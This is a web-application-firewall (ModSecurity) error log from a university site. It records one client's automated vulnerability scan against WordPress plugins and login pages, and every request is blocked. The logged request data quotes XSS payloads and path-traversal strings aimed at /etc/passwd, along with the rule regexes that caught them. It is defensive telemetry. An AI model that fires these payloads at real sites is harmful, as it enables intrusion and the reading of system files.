[Tue Aug 29 11:56:04.728942 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAAqY6P4AAAAr"]
[Tue Aug 29 11:56:05.531480 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAAqeFiUAAAAx"]
[Tue Aug 29 11:56:05.727552 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAApa-SgAAAAg"]
[Tue Aug 29 11:56:06.711874 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAAqY6QUAAAAr"]
[Tue Aug 29 11:56:06.849757 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16ZsCo-f0AAAq@sfgAAAAM"]
[Tue Aug 29 11:56:07.536283 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAAqY6Q8AAAAr"]
[Tue Aug 29 11:56:08.596517 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAAqY6RcAAAAr"]
[Tue Aug 29 11:56:08.627409 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAAq@sgUAAAAM"]
[Tue Aug 29 11:56:10.564593 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16asCo-f0AAAqTv2wAAAAa"]
[Tue Aug 29 11:56:10.589312 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAAq5@NIAAAAK"]
[Tue Aug 29 11:56:11.645038 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAApHRlMAAAAP"]
[Tue Aug 29 11:56:11.646806 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAAqeFkoAAAAx"]
[Tue Aug 29 11:56:12.556356 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAAqeFk8AAAAx"]
[Tue Aug 29 11:56:12.676015 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO16bMCo-f0AAArC7hkAAAAW"]
[Tue Aug 29 11:56:13.612729 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAArB1y0AAAAV"]
[Tue Aug 29 11:56:14.919464 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16bsCo-f0AAAq2KgIAAAAE"]
[Tue Aug 29 11:56:15.034636 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16b8Co-f0AAAq3a8IAAAAI"]
[Tue Aug 29 11:56:15.627370 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAAq3a8gAAAAI"]
[Tue Aug 29 11:56:16.854207 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16cMCo-f0AAAocygMAAAAR"]
[Tue Aug 29 11:56:17.131687 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16ccCo-f0AAAq3a80AAAAI"]
[Tue Aug 29 11:56:17.627985 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAAq@sjAAAAAM"]
[Tue Aug 29 11:56:18.974540 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAAqeFm8AAAAx"]
[Tue Aug 29 11:56:19.541739 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAAoAlAwAAAAC"]
[Tue Aug 29 11:56:21.792229 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArIARsAAAAX"]
[Tue Aug 29 11:56:21.832208 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArJXkUAAAAZ"]
